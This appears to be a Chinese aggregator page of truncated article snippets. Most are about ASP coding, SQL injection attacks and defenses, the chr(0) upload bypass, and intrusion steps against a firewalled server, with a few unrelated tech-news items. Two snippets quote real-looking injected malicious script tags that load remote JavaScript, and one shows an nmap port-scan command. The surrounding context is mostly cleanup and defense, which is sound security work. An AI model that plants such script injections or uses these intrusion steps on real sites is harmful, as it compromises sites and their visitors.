正则表达式（RegularExpression）为字符串模式匹配提供了一种高效、方便的方法。几乎所有高级语言都提供了对正则表达式的支持，或者提供了现成的代码库供调用。本文以ASP环境中常见的处理任务为例，介绍正则表达式的应用技巧。一、检验密码和邮件地址的格式我们的第一个实例示范正则表达式的一项基本功能：抽象地描述任意复...

newRegExpASP正则表达式<Execute方法>描述：对指定的字符串执行正则表达式搜索。语法：object.Execute(string)Execute方法的语法包括以下几个部分：object：必需的。总是一个RegExp对象的名称。string：必需的。要在其上执行正则表达式的文本字符串。说明：正...

近期，我管理的一个网站被注入木马代码<scriptsrc=http://cn.daxia123.cn/cn.js></script>，在百度搜索这段代码，竟然可以搜到20万多的网站被注入了，真是把我郁闷了一天啊！！！！这个木马大概在2008-12-24号爆发至今。。越来越多的网站中标。daxia...

我们在用ASP开发文件上传功能的时候，为了防止用户上传木马程序，常常会限制一些文件的上传，常用的方法是判断一下上传文件的扩展名是否符合规定，可以用right字符串函数取出上传文件的文件名的后四位，这样很容易就能判断了，但是这里面有一个漏洞，非常危险，就是chr(0)漏洞，详情请接着往下看。一、首先解释下什么是chr(0...

SQL注入是一种攻击方式，在这种攻击方式中，恶意代码被插入到字符串中，然后将该字符串传递到SQLServer的实例以进行分析和执行。任何构成SQL语句的过程都应进行注入漏洞检查，因为SQLServer将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。SQL注入的主要形式包括直接将代码...

装上了防火墙的主机，进行入侵攻击的大概思路小结一下。首先当然是用扫描器对这台服务器（以下简称主机A）进行常规的扫描，得到初步的信息。再用nmap-sSIP-P0-p139，透过防火墙查看是否开有139端口。从上面得到的信息我们可以简单的判断到：主机A的系统是什么，装有防火墙的话，一般是只允许80端口开放的。如果能够泄漏...

比较经典的一片帖子，今天转过来大家学习一下:编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQLInjection，即SQL注入。本文出处：http://www.yutianedu.com/52netw...

解决办法：控制面板->管理工具->服务，找到MSSQLSERVER服务，右键->属性->登录，选中“本地系统帐户”，确定是不是改密码了？估计是用户名和密码有差错,现在用本地系统帐户就可以了.SQLServer1069错误（由于登录失败而无法启动服务）解决方法1.我的电脑--控制面板--管理工具-...

上周给别人做了个网站，无意间发现自己的作品有很多漏洞，在短短的20秒就被自己用sql注入法给干了。所以查了一点关于sql注入的资料，并且有点感悟，希望能与新手们分享一下。高手们见笑了！SQL注入攻击的总体思路：发现SQL注入位置；判断服务器类型和后台数据库类型；确定可执行情况对于有些攻击者而言，一般会采取sql注入法。...

你的网站是否经常遭到非法攻击?是否因盗链或P2P多线程下载而耗尽带宽资源?是否没钱购买网上的此类软件?那么请使用Safe3IISFireWall吧！Safe3IISFireWall是一款完全免费的IIS防护软件，内置如下功能，主要防止黑客攻击和多线程下载占用带宽。软件功能：防止SQL注入式攻击；防止溢出代码攻击；防止特...

最近接收一个烂摊子，数据库都被sql注入过一两次了，到处都可以看到标题上那种东西，看得小妹我想死，我是燥性子看着有火，在网站上看了n多防注入的方法，记录一下一种是从数据库入手的，我这个烂摊子是用的sqlserver2000的，-----------------------------------------------...

现在做网站的专业人员越来越多，网站也越来越丰富和充实，不过可能很多人都没有发现，许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。这个就是sql注入问题。SQL注入是什么?许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一...

针对最近老是出现的SQL注入，借鉴网上一些SQL语句，写了如下语句。希望对中招的朋友有所帮助。使用方法：复制以下代码到SQL查询分析器，将‘<scriptsrc=http://cn.jxmmtv.com/cn.js></script>’修改成被注入的脚本。declare@delStrnvarch...

一、什么是SQL注入式攻击所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。在某些表单中，用户输入的内容直接用来构造（或者影响）动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻击。常见的SQL注入式攻击过程类如：⑴某个...

黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站，然后采用小明子这样的注入扫描工具，扫描整个网站，一旦发现有sql注入的漏洞或者上传漏洞，黑客就通过各种手段，上传自己的大马，如海阳木马；然后，黑客就把这个网站纳入他的肉鸡列表，随时在数据库里加入自己希望加的js代码，而这些代码往往是包含...

如何使用SQL注入攻击工具进行测试。给出SQL注入漏洞防御的措施。很简单的，建个ASP文件，名字为chk.asp，把下面的代码放到里面。在你的网站的顶部你应该有conn.asp吧。就是连接数据库的那个ASP文件，你可以再CONN.ASP里写，这样就可以了，路径要写对啊。<%dimsql_injdataSQL_in...

近年来我国经济不断取得重大飞跃，台式电脑逐渐成为落后产物，已不适应当前经济发展的需要。经有关部门研究，并通过公开听证，现决定：从即日开始，禁止所有个人、单位使用台式电脑，改用笔记本电脑、上网本、掌上电脑、手机等无线工具，违者将处以200元罚款并扣3分的处罚。 为统一思想，提高认识，保证禁台工作顺利开展、落到实处，现将...

给政府做的，完全要求高，居然用硬盘序列号，MAC地址，CPU地址三项来绑定指定的人来操作。看了看别的资料有提取CPU，MAC的现成代码却没有硬盘序列号，找了好久才找到提取硬盘序列号的参数。于是自己给补上了。特别说明：以下方法用到了ActiveXObject，只有IE浏览器才支持此组件。＜html＞＜head＞＜titl...

一、GetRows的使用方法：<%Setconn=Server.CreateObject(Adodb.Connection)conn.OpenProvider=Microsoft.Jet.OLEDB.4.0;DataSource=&Server.Mappath(test.mdb)SetRs=Server....

1、最简单的如下DimobjConnSetobjConn=Server.CreateObject(ADOBD.Connection)objConn.OpenApplication(Connection_String)Callthestoredproceduretoincrementacounteronthepageob...

本文件ip路径：<%=http://&request.servervariables(server_name)&request.servervariables(script_name)%>本机ip:<%=request.servervariables(remote_addr)%>...

一.服务环境变量Request.ServerVariables(Url)返回服务器地址Request.ServerVariables(Path_Info)客户端提供的路径信息Request.ServerVariables(Appl_Physical_Path)与应用程序元数据库路径相应的物理路径Request.Serv...

亲爱的朋友们，你们意料之中的事又来了，不必惊讶，这次小马哥挑战的可是国内非常牛X的“移动”老大。腾讯山寨黑手频现，这是业内众所周知的事了，现在说出来就跟家常便饭一样正常。可是今天，腾讯却要挑衅一下“移动”了。日前腾讯推出了类Kik软件(手机通信录的社交软件)腾讯微信，加大对移动IM(即时通讯、实时传讯)市场的争抢力度。...

目录KIK含义KIK发展Kik类应用的不确定性对BBM的冲击对运营商的冲击国内KIK现状KIK含义Kik即手机通信录的社交软件。，可基于本地通讯录直接建立与联系人的连接，并在此基础上实现免费短信聊天、来电大头贴、个人状态同步等功能。是一款功能简单到极致的跨平台即时通讯（IM）软件——它不能发送照片，不能发送附件。简单的...

摘要:终于，RIM以侵权名义起诉即时通讯创业企业Kik，而就在此前几天，RIM已经将Kik从其AppWorld应用商店移除。作为黑莓手机的制造商，RIM为何对一款刚刚面世不久的小软件如此大动干戈？这其中有什么玄机？本文并不想纠结于上述法律问题，或讨论虚无缥缈的...终于，RIM以侵权名义起诉即时通讯创业企业Kik，而就...